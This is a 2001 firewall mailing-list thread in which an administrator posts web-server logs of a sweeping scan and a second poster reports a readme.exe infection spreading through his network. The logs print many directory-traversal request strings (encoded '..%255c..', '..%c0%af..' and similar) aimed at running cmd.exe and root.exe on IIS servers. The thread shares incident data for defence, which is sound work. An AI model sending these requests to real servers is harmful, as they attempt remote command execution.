Re: something new afoot, sweeping scans:

Josh Welch Tue, 18 Sep 2001 09:12:11 -0700
Don't know if this is related, may be. The company which hosts our site has
a file readme.eml which got stuck on it's box. If you hit our URL, it asks
if you would like to save or open a file readme.exe, I have a copy of the
readme.exe currently if anyone would like to break it down. One of my users
ran it, we now have *.eml files and riched20.dll files all over our network.
Possibly related to a vulnerability discussed here,
http://groups.google.com/groups?q=riched20.dll&hl=en&group=comp.risks&rnum=1
&selm=CMM.0.90.1.944088342.risko%40chiron.csl.sri.com
----- Original Message -----
From: "Ron DuFresne" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:50 AM
Subject: something new afoot, sweeping scans:


>
> Folks,
>
> Someone mentioned seeing similiar signatures in their logs earlier today
> to the signatures we are seeing in dramtic rapidity in a short time span.
> Are other sites seeing similiar signatures <quick greps attached and
> posted below>  Has a new toy been unleshed, or is this an old toy we have
> not seen the signature for before:
>
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:53 -0400] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:54 -0400] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:55 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:56 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:57 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:00:58 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:00:59 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:00 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:01:01 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:02 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:03 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:01:04 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:40 -0400] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 210
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 208
> 208.1.131.11 - - [18/Sep/2001:10:49:41 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
> 208.1.131.11 - - [18/Sep/2001:10:49:43 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:44 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
> 208.1.131.11 - - [18/Sep/2001:10:49:45 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 265
> 208.1.131.11 - - [18/Sep/2001:10:49:46 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:47 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:48 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:49 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 208.1.131.11 - - [18/Sep/2001:10:49:50 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
> 208.1.131.11 - - [18/Sep/2001:10:49:51 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
>
>
>
> Thanks,
>
>
> Ron DuFresne
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D.  Just don't touch anything.
>

_______________________________________________
Firewalls mailing list
[EMAIL PROTECTED]
http://lists.gnac.net/mailman/listinfo/firewalls
Re: something new afoot, sweeping scans:

Reply via email to
